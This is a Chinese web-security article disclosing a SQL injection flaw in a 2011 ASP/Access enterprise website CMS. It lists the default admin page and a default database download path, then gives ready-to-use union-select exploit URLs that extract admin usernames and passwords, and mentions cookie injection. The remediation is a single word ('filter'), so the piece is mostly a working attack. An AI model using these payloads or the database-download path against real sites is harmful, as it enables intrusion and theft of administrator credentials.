网站地图    收藏   

主页 > 后端 > 网站安全 >

冠龙科技企业网站管理系统 2011 sql注入漏洞及修

来源:自学PHP网    时间:2015-04-17 14:47 作者: 阅读:

[导读] by Mr.DzY from www.0855.tv源码简介:冠龙科技企业网站管理系统是基于ASP+ACCESS技术开发的电子商务平台,属于全自动化、全智能的在线方式管理、维护、更新的网站管理系统。此系统直接上传到...

by Mr.DzY from www.0855.tv

源码简介:
冠龙科技企业网站管理系统是基于ASP+ACCESS技术开发的电子商务平台,属于全自动化、全智能的在线方

式管理、维护、更新的网站管理系统。此系统直接上传到你的网站空间就可以使用了。完全后台操作。

源码下载:http://www.2cto.com/ym/201109/29454.html


默认后台:
http://www.2cto.com /admin/login.asp

默认数据库:
http://www.2cto.com /databases/%23database.mdb

exp:
http://www.2cto.com /2011/CompVisualizeBig.asp?id=23 union select 1,username%2bpassword,3,4,5 from admin

或者单独查:
http://www.2cto.com /2011/CompVisualizeBig.asp?id=23 union select 1,username,3,4,5 from admin
http://www.2cto.com /2011/CompVisualizeBig.asp?id=23 union select 1,password,3,4,5 from admin

另外还存在多处的漏洞.可cookies注入.

上次有朋友问%2b是什么?就是ascii码的"+"号的十六进制值.

修复:过滤.

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论